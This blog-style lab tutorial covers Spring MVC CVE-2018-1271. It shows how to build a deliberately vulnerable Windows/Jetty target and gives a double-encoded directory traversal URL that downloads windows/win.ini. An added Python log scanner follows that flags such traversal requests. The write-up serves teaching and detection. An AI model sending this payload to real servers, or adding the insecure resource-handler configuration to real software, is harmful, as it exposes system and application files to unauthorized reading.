It’s too late for this blog post but I’ve been caught up with other tasks so couldn’t post this earlier. Anyways, in this blog, we’ll look at how to set up a vulnerable target for CVE-2018-1271 and exploit it.
The issue exists in Spring Framework versions 5.0 to 5.0.4 and 4.3 to 4.3.14, which allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). It should be noted that a few conditions must hold for this vulnerability to be introduced:
- The target server is running on Windows.
- The application is running on Jetty.
- The application serves files from the file system using the file:// protocol.
Setting up a vulnerable target:
1. Install JDK 1.8 or higher.
2. Download and setup Maven 3.6.0 to C:\Opt\apache-maven-3.6.0
3. Configure Environment Variables:
- Set JAVA_HOME to C:\Program Files (x86)\Java\jdk1.8.0_171\ or whichever path it’s installed in.
- Set MAVEN_HOME to C:\Opt\apache-maven-3.6.0\
- Append MAVEN_HOME path to PATH variable: C:\Opt\apache-maven-3.6.0\bin\
- Launch a command prompt and make sure the following commands work:
mvn -version
java -version
4. Now download the spring-mvc-showcase sample application, either via Git or by downloading the ZIP: git clone https://github.com/spring-projects/spring-mvc-showcase.git
5. CD into the spring-mvc-showcase-master directory.
6. Edit POM.XML and set org.springframework-version to 5.0.0.
7. Locate WebMvcConfig.java. It’s usually under ./src/main/java/org/springframework/samples/mvc/config/WebMvcConfig.java
8. Edit WebMvcConfig.java and set registry.addResourceHandler to the following. This is what makes it vulnerable to Directory Traversal:
registry.addResourceHandler("/resources/**").addResourceLocations("file:./src/main/resources/","/resources/");
9. Now start the project with jetty:
mvn jetty:run
10. Make sure the server is listening on the port specified, usually port 8080.
11. Now visit the following link:
http://:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
12. This should download the WIN.INI file.
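To confirm the lab request shows up in monitoring, the following added example (not part of the original post or of the Spring project) decodes request paths repeatedly and flags static-resource requests that end up containing backslashes or ".." segments. The log format, the /resources/ prefix default and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: access-log lines carry the request as "METHOD path HTTP/x.y".
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A ".." path segment delimited by either slash style.
DOTDOT_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

def decode_fully(path, max_rounds=5):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds

def classify(line, prefix="/resources/"):
    """Return a finding for a suspicious static-resource request, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    raw = match.group(1).split("?", 1)[0]
    decoded, rounds = decode_fully(raw)
    if prefix not in decoded:
        return None
    reasons = []
    if "\\" in decoded:
        reasons.append("backslash")
    if DOTDOT_RE.search(decoded):
        reasons.append("dot-dot segment")
    if not reasons:
        return None
    return {"raw": raw, "decoded": decoded, "rounds": rounds, "reasons": reasons}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [finding for finding in map(classify, lines) if finding]

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    '192.0.2.5 - - [01/Jan/2019:10:00:00 +0000] "GET /spring-mvc-showcase/resources/css/site.css HTTP/1.1" 200 512',
    '192.0.2.9 - - [01/Jan/2019:10:00:05 +0000] "GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/windows/win.ini HTTP/1.1" 200 92',
    '192.0.2.9 - - [01/Jan/2019:10:00:07 +0000] "GET /spring-mvc-showcase/resources/..%5c..%5cwindows/win.ini HTTP/1.1" 404 0',
    '192.0.2.7 - - [01/Jan/2019:10:00:09 +0000] "GET /spring-mvc-showcase/simple HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["rounds"], finding["reasons"], finding["raw"])
```

A rounds value of 2 or more on a flagged request means the path was encoded more than once, which is the shape of the request in step 11.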